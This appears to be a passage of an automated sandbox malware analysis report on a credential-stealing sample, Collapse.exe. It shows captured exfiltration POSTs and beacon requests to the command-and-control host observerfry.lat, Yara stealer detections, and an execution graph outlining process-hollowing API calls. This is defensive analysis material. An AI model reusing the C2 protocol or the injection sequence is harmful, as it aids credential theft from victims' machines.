                                                                                                      Data Ascii: --TOXTP5F9Content-Disposition: form-data; name="hwid"FEAF5A7E6BCBA648961F82810656F945--TOXTP5F9Content-Disposition: form-data; name="pid"1--TOXTP5F9Content-Disposition: form-data; name="lid"BVnUqo--@distez--TOXTP5F9Content-Dispos
                                                                                                      2024-12-24 01:17:20 UTC1124INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 24 Dec 2024 01:17:20 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=2105rrqsmjffkqbeue15iff25s; expires=Fri, 18 Apr 2025 19:03:59 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2dkw1a0VbNHZlHrmGn31Tr2KvmhvBPrJuPAvuUgrQEoJpatHQCvmeth0RMtJnk1HHiquHZeE3paF1aaDEdG25Lr%2BcVaH29hZEgHi71gwMLVcj04Dl2kY%2FGaKp%2Bb5evpro50%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f6cc047af46f78f-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1500&min_rtt=1463&rtt_var=624&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2068&delivery_rate=1653454&cwnd=137&unsent_bytes=0&cid=0b40f741dcd21b3e&ts=770&x=0"
                                                                                                      2024-12-24 01:17:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2024-12-24 01:17:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      6192.168.2.749726172.67.199.724435924C:\Users\user\Desktop\Collapse.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-24 01:17:22 UTC273OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=YIZOIU1F9
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 552485
                                                                                                      Host: observerfry.lat
                                                                                                      2024-12-24 01:17:22 UTC15331OUTData Raw: 2d 2d 59 49 5a 4f 49 55 31 46 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 41 46 35 41 37 45 36 42 43 42 41 36 34 38 39 36 31 46 38 32 38 31 30 36 35 36 46 39 34 35 0d 0a 2d 2d 59 49 5a 4f 49 55 31 46 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 49 5a 4f 49 55 31 46 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 64 69 73 74 65 7a 0d 0a 2d 2d 59 49 5a 4f 49 55 31 46 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                      Data Ascii: --YIZOIU1F9Content-Disposition: form-data; name="hwid"FEAF5A7E6BCBA648961F82810656F945--YIZOIU1F9Content-Disposition: form-data; name="pid"1--YIZOIU1F9Content-Disposition: form-data; name="lid"BVnUqo--@distez--YIZOIU1F9Content-Di
                                                                                                      2024-12-24 01:17:22 UTC15331OUTData Raw: a0 d8 11 28 e9 da ed 29 35 9e b4 66 22 a5 e6 94 ac e6 10 2c d3 53 8a f8 04 de 4c 69 19 a6 f8 3c 66 91 9c c6 6d 09 74 95 67 73 1d f1 1c e2 9a fc f0 92 73 c1 2f db 87 d9 24 22 b5 03 45 11 d8 92 5e fb 16 0c 1b ec 2a 4c 8f 32 c2 c2 7e 0b d0 06 37 76 c9 44 41 b9 b6 5f 38 0f 24 2f 3b 2f 4d 7e 74 db f1 51 2c f9 42 53 e5 54 a9 5d 11 cc 3c 97 99 51 06 75 f2 a5 80 2b 0b fd de 2b d7 f9 cc 3d 4d a8 82 5b 07 37 6c 34 53 6a 3c 6a 63 e9 7e 72 a8 75 51 de 99 e1 f0 eb 80 16 4d ab 4e 5a d9 93 b4 73 64 cb b2 bc 65 37 ec 07 be 2a 59 10 72 0f 53 1e c4 09 56 b5 2b 83 68 01 cd 4f 3b 03 01 89 b1 c1 32 db df d5 28 ad 28 ca e2 e3 ea 15 65 8d 7c 1b 24 a4 38 80 b4 e9 61 6c 4a fb 82 4a 9e 6b 05 be 5e 9e f2 24 b0 4d 1f 10 0a ef dc 16 79 08 33 8d fa 6e 07 c0 91 97 88 cf 92 ad 55 18 dd
                                                                                                      Data Ascii: ()5f",SLi<fmtgss/$"E^*L2~7vDA_8$/;/M~tQ,BST]<Qu++=M[7l4Sj<jc~ruQMNZsde7*YrSV+hO;2((e|$8alJJk^$My3nU
                                                                                                      2024-12-24 01:17:22 UTC15331OUTData Raw: 7e 4c de 7d 0c 13 17 eb d7 cc 7b 5b 52 0a 2a 39 2f 99 6e 1f 5d eb 06 f1 ba d4 1f 6b 86 dc 73 03 f4 8b 3f 4c 09 ee 6e bc 2f ea 71 a5 5b 3d 4b bf 78 38 f9 2e bd 72 60 3b f7 c7 03 be 8f 0f 5a 97 77 2a 47 d7 fc 0a 9e 3e 7c 29 35 cc 79 ba fa f2 e9 cd 5f 6f 55 2f 37 af f6 d4 6d b2 57 6b b7 dd 5e c4 3f 54 9b 93 06 c3 de 03 05 5f 3f 5e 73 4c 4b 37 1c 8f 5c 9d b8 6f b5 ce 5c 8a 25 1b 92 b9 fd d8 44 82 d3 42 66 57 a9 a2 84 ff e7 58 9f 65 9a 6a 61 6c 8a 87 6c f2 a3 d5 03 b5 6e 19 55 0f 73 96 8c e8 e7 d0 bc 9a a0 87 49 28 5d 93 b9 9a b8 1f a1 b6 e1 bd f7 fe 7a 4c 3f 70 08 ae 0e 6c 71 d4 ee 09 f6 47 03 b7 cb de 11 b1 3e 74 69 f4 b4 1b c4 e4 23 1b 1f 0c 13 c1 a6 fe 23 e1 73 17 2b 37 1f db 2c b3 f1 01 64 9a 55 16 c1 11 5a 44 bd df ee 1e 23 c9 1d a4 c8 dd 0d 8e c8 fe aa
                                                                                                      Data Ascii: ~L}{[R*9/n]ks?Ln/q[=Kx8.r`;Zw*G>|)5y_oU/7mWk^?T_?^sLK7\o\%DBfWXejallnUsI(]zL?plqG>ti##s+7,dUZD#
                                                                                                      2024-12-24 01:17:22 UTC15331OUTData Raw: 47 f3 7b c3 ec e2 34 9d 7c a5 6e 0b d6 f5 1c e4 0f 66 4b a9 56 69 3f df 27 6d d6 24 78 ae 33 2d 12 86 23 3c f9 50 9c ee df 42 be d8 e2 db 2c af 94 e6 2e 5f c9 7b 5f ae 61 16 9f aa 27 3c 20 6f af 61 17 b8 4a 7a a8 13 2a bb bd 38 30 21 fe bd e3 a7 8f ad 42 fa 6a 8d d0 15 31 75 a3 f4 34 41 d7 ef 06 ed 3f 3a 6f ce a6 e9 e2 8e 2a f6 b9 82 54 a9 dc 61 4f f5 de 39 a3 1d a3 a2 37 b7 e0 ce 17 1e 63 77 04 4f 3e 3b 0b fc e1 30 4f 9e 9f 55 59 42 8c 2e 79 a3 30 c3 d9 22 0d 08 92 38 5a 26 e7 0d 1d 5e 7c 0b d4 a1 e5 db 53 e5 c5 e9 b9 fd 76 e4 7e 17 7e 53 f7 a9 bc 8a 4b 0a 77 87 34 6e a7 9b 7d 24 e6 f2 2e 1f 8e c6 e5 6b 35 b8 fd bc e0 5d 9e cf 23 68 69 82 91 16 aa d8 ac 59 19 79 47 5c 36 b3 73 99 fa e1 cd f9 7e df 28 47 9f 20 ce d4 2a ff 13 ee c0 07 1a 98 8e ce 3c cc 70
                                                                                                      Data Ascii: G{4|nfKVi?'m$x3-#<PB,._{_a'< oaJz*80!Bj1u4A?:o*TaO97cwO>;0OUYB.y0"8Z&^|Sv~~SKw4n}$.k5]#hiYyG\6s~(G *<p
                                                                                                      2024-12-24 01:17:22 UTC15331OUTData Raw: b5 d8 50 4c 8c 07 ec 54 c1 30 95 97 dd 0e 70 d4 0f 51 1d a6 88 e5 5a 4f f8 93 52 bf 3e da cc d8 ed 84 cf 8f cf 7f f0 55 91 6f fe c6 dc a7 86 7e 31 a1 9f 4a d1 41 0c 23 76 6c 0f 6e d6 8f f0 70 3e e1 81 71 b5 b1 07 ba a3 2b 2f 65 ce 45 21 6c 72 e3 ec c7 b4 6a 43 3d b9 84 26 c3 4b d3 55 4f e8 c9 68 73 f5 ec 87 fd dd 0b 2c 30 e1 f9 ab 44 4d 89 48 27 ae f2 f2 4c ac 15 7c 25 06 df 3a f7 34 c2 43 bf eb dd 4b 44 bb 51 6d 7f e3 36 fc 19 e3 ce b7 ba 76 32 bf ce 36 c4 2f 34 7d f6 7a 9b da 8b 9b 86 76 22 c4 57 0d f1 4d c7 92 d1 9e 85 14 f5 91 83 11 ea 59 f1 71 9f 25 47 a1 65 91 d5 43 b3 0d ae ea d7 38 d7 0f e1 5f 50 12 5c dc 8c e6 b5 22 ed e0 36 85 35 5f 54 bb f1 26 82 52 14 c1 f4 9f b1 31 5d 71 6b c5 38 ae 9e 81 e2 54 f6 d9 90 95 f7 b1 3d bf 6b 0e 61 7c 2c aa 7f 0d
                                                                                                      Data Ascii: PLT0pQZOR>Uo~1JA#vlnp>q+/eE!lrjC=&KUOhs,0DMH'L|%:4CKDQm6v26/4}zv"WMYq%GeC8_P\"65_T&R1]qk8T=ka|,
                                                                                                      2024-12-24 01:17:22 UTC15331OUTData Raw: 07 a6 ff d2 2a 9f d9 6e d0 cc 23 78 be 42 b2 1b 26 60 3f c4 f8 30 d7 b5 f4 63 ee aa c4 c6 b5 99 a0 bc 3b dd 2e e7 87 3f e5 09 61 c1 fe f6 a9 5d 87 93 ef a1 4e fc 65 ae 05 12 be a3 b7 bd 7b 87 4b f4 86 73 dc 8d 18 8b 22 f2 ac 10 d8 5f 3f 35 9a 72 78 7b 25 12 1f fb 86 63 60 ed 37 53 c4 46 b5 b8 c2 ef a9 08 0a 19 f1 09 79 39 cc 70 6a 73 d9 a6 cf 67 bc a8 9f ee 94 9a 38 af 1f 79 4c 23 fe a3 11 62 dc b7 0b 66 5b 50 7c d1 3b 3a e4 c2 82 35 39 72 a8 c8 9b 3c 54 81 79 95 ae b3 7b cd e7 b3 58 92 a8 ea 5d f5 be 25 1c 15 10 c1 c4 f8 04 bd c6 83 c0 bc 79 c4 ca 36 0d d1 68 ed 3f e7 7d 30 b4 bd 14 b5 12 8b a2 6c ba db 87 17 63 22 40 4b 13 10 f8 81 c2 e0 73 68 3e 99 7a 75 8b c2 47 b8 c6 01 a9 0a 35 06 85 50 3c 3e fd 6c 76 d4 d1 b2 2d b0 c8 5c 1b 56 cc 55 da 9b 4d 4a b0
                                                                                                      Data Ascii: *n#xB&`?0c;.?a]Ne{Ks"_?5rx{%c`7SFy9pjsg8yL#bf[P|;:59r<Ty{X]%y6h?}0lc"@Ksh>zuG5P<>lv-\VUMJ
                                                                                                      2024-12-24 01:17:22 UTC15331OUTData Raw: ba 08 53 04 6b 1e bf 52 7a f5 52 58 b7 78 36 39 a1 95 86 03 02 e5 08 ed 9b 2f 79 93 61 22 4c 00 a6 73 b3 86 93 d8 ad 90 e7 db 96 34 b7 21 78 86 ef 1c 09 6b 33 e5 b6 fc 5f 2e a1 ae c6 60 d2 5b b0 f1 4e f7 48 b4 36 ce 29 f2 92 04 e2 c6 48 b4 2e 22 a8 97 fa 6f 28 91 8c 6a 65 f7 5d df d7 ca 2e 7c 83 57 ab 40 88 cb 28 1b 0e ea 7b a5 22 6f 03 bf 32 44 3b 84 35 8f f4 ef fb ee 01 09 b5 60 5f db 16 a4 b5 b2 23 80 cc 72 e1 cd e4 07 18 a9 98 3e 6f 81 01 99 43 57 73 5e fd 25 41 d3 10 ef a1 be 7d b0 d9 2a 81 cf a6 3d 12 22 ce 6e 75 06 14 ef 6e d0 43 66 09 99 07 3d bb a6 a2 f3 ef 85 d7 8c 33 57 aa f9 38 45 22 c9 1b 17 e0 70 38 d8 4f 16 b1 05 f1 d4 39 59 71 15 28 53 0d 14 1d 57 34 b6 04 d9 5e 34 99 1d 2f 03 b4 03 99 9b 8d c5 56 a3 4e 58 4d a1 fc 1e 99 85 51 50 7e 7c a0
                                                                                                      Data Ascii: SkRzRXx69/ya"Ls4!xk3_.`[NH6)H."o(je].|W@({"o2D;5`_#r>oCWs^%A}*="nunCf=3W8E"p8O9Yq(SW4^4/VNXMQP~|
                                                                                                      2024-12-24 01:17:22 UTC15331OUTData Raw: af c4 d5 22 e5 20 75 d6 c2 d1 d6 57 67 ca e6 17 1b 39 27 97 db 08 9a 6c 85 a5 c2 e1 f4 cd 6d 8b 08 4d 3e b3 76 b6 ec 8b 90 45 8d 50 8d 81 70 61 e6 f5 33 62 a2 63 ed d3 f4 04 f7 6b 42 1f 1a 9c 6f 39 f4 0a ed dc 39 0b fa 98 eb 2b ff 5b f2 20 2f 1f 7a ae ed 23 dd 5b 88 e8 bf 7d 7e 7e 9f 8d ea a5 f3 47 f8 b3 02 ec 66 d7 36 73 4f e2 7c 91 4a ad 02 e3 83 b4 0e 2c ea 64 a1 c0 d1 57 56 07 77 f1 ae 20 f5 04 85 a0 ca 63 14 75 54 4a 3e d0 0a e2 d1 a0 dd 32 f9 71 e6 28 b7 8c 07 28 86 ed d7 de 1b 9a bd 58 63 15 1c 19 03 e0 d4 87 5c f9 43 73 3e a2 05 58 ab 55 7b 80 fe bd 3a 64 27 0f c8 ca d0 c5 ea 1f 5d a6 a3 80 89 71 b3 0e 72 00 5b 90 0a 7d 35 80 f9 80 3a ea 5c 29 b7 06 c7 a5 4d 2f 15 0a 11 73 5d f3 f9 58 67 f4 33 35 6a 75 e5 83 82 64 c1 a9 85 9a 2b de df 9b ee 5e d3
                                                                                                      Data Ascii: " uWg9'lmM>vEPpa3bckBo99+[ /z#[}~~Gf6sO|J,dWVw cuTJ>2q((Xc\Cs>XU{:d']qr[}5:\)M/s]Xg35jud+^
                                                                                                      2024-12-24 01:17:22 UTC15331OUTData Raw: 3b 1a ff 80 6d 71 56 27 e9 8b 5a 50 5b 8d 84 80 cc 93 b3 76 9c e9 f1 ab 23 d0 df dc 23 72 ee 05 e0 5f 90 5e 52 81 71 0b 83 62 5a d5 5f 3f b7 a3 1f 0c 5f 01 3f 2e fd 5e 7d 66 76 d9 11 18 1d 83 25 43 e2 e9 bd 3b 87 0c 90 1c 74 64 e5 d4 ea a9 9f 0d 48 46 99 38 96 43 0b e8 bc 9a b2 d8 43 52 56 04 f6 b5 b9 0c fb d9 ea 37 b6 77 43 5a 6f 3c 51 e9 38 4a cf c0 35 e7 17 0f 76 fe 2a 52 38 01 55 af 7d f0 ba d9 ea 67 90 a9 23 3b 6d 23 bd e9 42 05 c5 2f 1a 13 a6 5d 22 14 9f 1f bc ad 41 5c 75 85 90 68 ed 6f fc 39 76 3d 9c b2 61 c3 53 31 c5 d2 e1 4b 92 bc b4 eb 45 2d bb f7 5a 8c 4c 66 11 dd 5c e9 23 e9 16 1f 73 d2 07 ab 7b df 3c 73 5d 74 71 28 93 a2 5b 5e 5f 7b 90 17 dc 25 93 17 7c 39 ea 46 96 f9 63 e0 de 42 97 21 e1 fb 38 8f 7f bf 46 41 cf b2 2c 9f b6 0a 81 07 a7 e7 6a
                                                                                                      Data Ascii: ;mqV'ZP[v##r_^RqbZ_?_?.^}fv%C;tdHF8CCRV7wCZo<Q8J5v*R8U}g#;m#B/]"A\uho9v=aS1KE-ZLf\#s{<s]tq([^_{%|9FcB!8FA,j
                                                                                                      2024-12-24 01:17:22 UTC15331OUTData Raw: f2 b4 f1 50 e2 ec bc 4e 6f 44 9c 90 0b f6 a2 26 23 8e b5 73 30 e7 9a bb e8 1a c5 be e9 a8 32 b4 b9 c1 b3 35 e9 0b de d9 b3 a7 3d 6f 7e 9a 21 41 4a 59 ff d9 7e cf 7f d6 2f ff c6 ec 4b fe 70 8f 13 7f ae 31 ac d6 86 d1 c2 4b f5 b3 13 c5 8e 57 cd d0 98 fd 3c 0c 75 bd 3f c5 65 3d 6b f6 a5 df 1d 25 98 1a 30 f8 c0 77 e4 d9 9c 1f 71 95 48 9d d3 75 65 c3 9c ce 1a 4c 6f 53 25 e5 8b 41 1b 75 e1 96 59 cf 88 2d bf 32 84 9b 85 31 0b 74 49 11 0d b2 4d 11 4f 86 99 ee e8 15 77 c1 86 99 1d 5d e9 1f b4 e7 ff 91 5e f9 37 6c 8e 32 75 d5 ec b2 20 e8 f2 6b 34 d9 82 04 25 4a ec f6 67 9c 26 04 63 bb cf cd 6a 9f ce 85 88 90 be a9 2f 0a ee d7 b3 f4 ce ec f4 9e a5 bb 8a 95 5e 0e ab 7e e3 1e 40 a5 d4 b8 db e7 58 b2 d7 f3 0f df 3d d6 6c dd b0 2a f1 77 ce 56 e3 ae bf 27 fe d5 04 89 ff
                                                                                                      Data Ascii: PNoD&#s025=o~!AJY~/Kp1KW<u?e=k%0wqHueLoS%AuY-21tIMOw]^7l2u k4%Jg&cj/^~@X=l*wV'
                                                                                                      2024-12-24 01:17:25 UTC1132INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 24 Dec 2024 01:17:25 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=24j5leodsbkb5430ua6gt8t5u9; expires=Fri, 18 Apr 2025 19:04:03 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wwORm3hWOGosfNE22%2FuaVK0pvMWMBUjzVVPMwwdk2swMZdIchZOiP2zgsIM%2BYBgsdIPqbIWjLlxGqP0Yh4nTg5yBJTDRaQxQNZ2TvwM%2FZhHA4sJHf14QSXiBhrSK0G6hd9o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f6cc05a5c3f4332-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2329&min_rtt=1734&rtt_var=1076&sent=301&recv=580&lost=0&retrans=0&sent_bytes=2835&recv_bytes=554978&delivery_rate=1683967&cwnd=118&unsent_bytes=0&cid=af7c264466d3ded0&ts=2844&x=0"


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      7192.168.2.749740172.67.199.724435924C:\Users\user\Desktop\Collapse.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-24 01:17:26 UTC263OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 84
                                                                                                      Host: observerfry.lat
                                                                                                      2024-12-24 01:17:26 UTC84OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 64 69 73 74 65 7a 26 6a 3d 26 68 77 69 64 3d 46 45 41 46 35 41 37 45 36 42 43 42 41 36 34 38 39 36 31 46 38 32 38 31 30 36 35 36 46 39 34 35
                                                                                                      Data Ascii: act=get_message&ver=4.0&lid=BVnUqo--@distez&j=&hwid=FEAF5A7E6BCBA648961F82810656F945
                                                                                                      2024-12-24 01:17:27 UTC1119INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 24 Dec 2024 01:17:27 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=1umobn2et74t00jifat63epn4p; expires=Fri, 18 Apr 2025 19:04:06 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aILI76ga8bTncPiQ1lQWiqqR9kPIXQLiol2RNPUmHEpuh2BgrjXVSzJZm3pIvlaMGUv7lpunZ6sKGijYQgJ7TzVCTiJYBd6TrAk6oyMza%2FZqin3Miw4ba6IzAE2CIUyrrjU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f6cc07538110cb0-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1840&min_rtt=1754&rtt_var=719&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=983&delivery_rate=1664766&cwnd=242&unsent_bytes=0&cid=041c1640cb60db1b&ts=779&x=0"
                                                                                                      2024-12-24 01:17:27 UTC126INData Raw: 37 38 0d 0a 79 47 7a 38 65 51 32 78 31 65 32 4b 57 2f 63 52 66 49 69 68 48 59 58 44 57 79 78 6d 2b 71 78 38 4e 31 49 55 74 4d 6c 79 79 55 71 54 46 39 34 4d 4c 34 76 33 68 66 34 76 68 79 73 67 70 2f 30 79 74 50 64 73 41 6c 4c 50 67 6b 67 41 66 43 79 46 6c 56 32 71 4a 61 59 45 6b 77 70 35 6e 37 43 56 37 33 6e 62 4d 78 72 38 67 79 65 31 37 33 6c 4a 52 4d 43 63 41 57 6f 3d 0d 0a
                                                                                                      Data Ascii: 78yGz8eQ2x1e2KW/cRfIihHYXDWyxm+qx8N1IUtMlyyUqTF94ML4v3hf4vhysgp/0ytPdsAlLPgkgAfCyFlV2qJaYEkwp5n7CV73nbMxr8gye173lJRMCcAWo=
                                                                                                      2024-12-24 01:17:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Click to jump to process

                                                                                                      Click to jump to process

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Click to jump to process

                                                                                                      Target ID:0
                                                                                                      Start time:20:17:04
                                                                                                      Start date:23/12/2024
                                                                                                      Path:C:\Users\user\Desktop\Collapse.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\Collapse.exe"
                                                                                                      Imagebase:0x980000
                                                                                                      File size:540'160 bytes
                                                                                                      MD5 hash:06BB4E80F74838278CE9467788CC6D94
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:1
                                                                                                      Start time:20:17:04
                                                                                                      Start date:23/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff75da10000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:3
                                                                                                      Start time:20:17:04
                                                                                                      Start date:23/12/2024
                                                                                                      Path:C:\Users\user\Desktop\Collapse.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Users\user\Desktop\Collapse.exe"
                                                                                                      Imagebase:0x980000
                                                                                                      File size:540'160 bytes
                                                                                                      MD5 hash:06BB4E80F74838278CE9467788CC6D94
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:4
                                                                                                      Start time:20:17:04
                                                                                                      Start date:23/12/2024
                                                                                                      Path:C:\Users\user\Desktop\Collapse.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Users\user\Desktop\Collapse.exe"
                                                                                                      Imagebase:0x980000
                                                                                                      File size:540'160 bytes
                                                                                                      MD5 hash:06BB4E80F74838278CE9467788CC6D94
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:5
                                                                                                      Start time:20:17:04
                                                                                                      Start date:23/12/2024
                                                                                                      Path:C:\Users\user\Desktop\Collapse.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Users\user\Desktop\Collapse.exe"
                                                                                                      Imagebase:0x980000
                                                                                                      File size:540'160 bytes
                                                                                                      MD5 hash:06BB4E80F74838278CE9467788CC6D94
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:6
                                                                                                      Start time:20:17:04
                                                                                                      Start date:23/12/2024
                                                                                                      Path:C:\Users\user\Desktop\Collapse.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\Collapse.exe"
                                                                                                      Imagebase:0x980000
                                                                                                      File size:540'160 bytes
                                                                                                      MD5 hash:06BB4E80F74838278CE9467788CC6D94
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000003.1375521268.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000003.1374794026.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Reset < >

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:10.1%
                                                                                                        Dynamic/Decrypted Code Coverage:0.4%
                                                                                                        Signature Coverage:1.3%
                                                                                                        Total number of Nodes:2000
                                                                                                        Total number of Limit Nodes:32
                                                                                                        execution_graph 23178 98d39a 23179 98d3d8 23178->23179 23180 98d3a3 23178->23180 23180->23179 23183 9979ba 23180->23183 23182 98d3cb 23184 9979cc 23183->23184 23187 9979d5 ___scrt_uninitialize_crt 23183->23187 23185 997b38 ___scrt_uninitialize_crt 68 API calls 23184->23185 23186 9979d2 23185->23186 23186->23182 23188 9979e4 23187->23188 23191 997cbd 23187->23191 23188->23182 23192 997cc9 ___scrt_is_nonwritable_in_current_image 23191->23192 23199 991d4e EnterCriticalSection 23192->23199 23194 997cd7 23195 997a16 ___scrt_uninitialize_crt 68 API calls 23194->23195 23196 997ce8 23195->23196 23200 997d11 23196->23200 23199->23194 23203 991d62 LeaveCriticalSection 23200->23203 23202 997a0b 23202->23182 23203->23202 18801 9b619e 18805 9b61d4 18801->18805 18802 9b6321 GetPEB 18803 9b6333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 18802->18803 18804 9b63da WriteProcessMemory 18803->18804 18803->18805 18806 9b641f 18804->18806 18805->18802 18805->18803 18807 9b63ca TerminateProcess 18805->18807 18808 9b6461 WriteProcessMemory Wow64SetThreadContext ResumeThread 18806->18808 18809 9b6424 WriteProcessMemory 18806->18809 18807->18805 18809->18806 21478 98d2b9 21479 98d2db 21478->21479 21483 98d2f0 21478->21483 21484 98d431 21479->21484 21487 98d49d 21484->21487 21488 98d44c 21484->21488 21485 98ba3f 